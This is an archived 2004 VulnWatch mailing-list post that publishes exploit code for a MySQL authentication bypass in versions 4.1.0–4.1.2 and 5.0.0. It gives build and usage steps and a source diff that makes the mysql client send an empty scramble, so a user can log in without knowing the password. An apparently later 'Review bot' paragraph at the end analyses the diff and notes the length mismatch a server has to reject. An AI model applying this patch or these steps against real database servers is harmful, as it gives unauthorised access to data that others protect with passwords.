[VulnWatch] MySQL authentication bypass exploit code.
- To: vulnwatch@xxxxxxxxxxxxx
- Subject: [VulnWatch] MySQL authentication bypass exploit code.
- From: bambam@xxxxxxxxxxxxxxxxxxxxx
- Date: Thu, 8 Jul 2004 09:42:45 +0100 (BST)
Background
**********
Chris Anley (chris@xxxxxxxxxxxxxxx) discovered an
authentication bypass vulnerability in versions 4.1.0 -
4.1.2 and 5.0.0 of MySQL. His paper of Monday 5th July
entitled "Hackproofing MySQL" included details of the
vulnerability, along with other information on MySQL
security issues, but included no exploit code.
In his paper he states that:
"This bug is relatively easy to exploit, although it is
necessary to write a custom MySQL client in order to do so."
This seemed a little strange to me, as I just altered
the mysql client's own source to include the attack.
Diffs are attached against the version 5.0.0-alpha source
distribution. (Since this is the distribution for "previewing
and testing new features" ;-)
Mitigating Factors
******************
Chris pointed out the mitigating factors of this attack in
his paper, but they are worth reiterating:
1) The attacker must be able to connect to the mysql daemon.
2) The attacker must know a valid username for the mysql database.
3) The attacker must be connecting from a host valid for
that username (localhost by default in the case of the
'root' mysql user).
Usage
*****
Download and unpack the 5.0.0-alpha source from the mysql
website, then patch the file sql-common/client.c with:
sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
sql-common/ $ cd ..
mysql-5.0.0-alpha/ # ./configure
mysql-5.0.0-alpha/ # make
Then simply use the resultant client binary (mysql) as you
would normally, with total disregard for the password you
specify:
mysql-5.0.0-alpha/ $ ./client/mysqld -h hostname -u username
Just press enter at the password prompt - and if the server
is vulnerable you should be logged in.
Tested against server version 5.0.0-alpha, but should work
against the other vulnerable versions since the server code
is the same :-)
Greetings
*********
to everyone in the uk scene, especially the whole brum crew
(past and present), all the sheffield mormons (i'm doing
this for satan), and to all those who don't believe in
change for the better - may you be proven wrong in time.
bambam
--
Cry 'Socket(),' and let slip the packets of war;
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;
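Review bot: The replacement `sprintf(end,"\x14\x00");` relies on the embedded `\x00` terminating the format string, so sprintf writes only the 0x14 byte plus its own NUL terminator; `end+=2` happens to agree with that, but the intent is clearer as two explicit byte stores in the style of the removed `*end++= SCRAMBLE_LENGTH;`. The removed branch also chose between the secure and `_323` encodings on `mysql->server_capabilities & CLIENT_SECURE_CONNECTION`; the new lines send the same two bytes regardless of what the server advertised, so the client no longer distinguishes the two protocol paths. For defenders, note what the hunk leaves on the wire: a declared scramble length of 0x14 (20, the value of `SCRAMBLE_LENGTH` written by the removed code) followed by no scramble bytes, which is precisely the declared-length versus actual-payload mismatch a server must check and reject rather than trust.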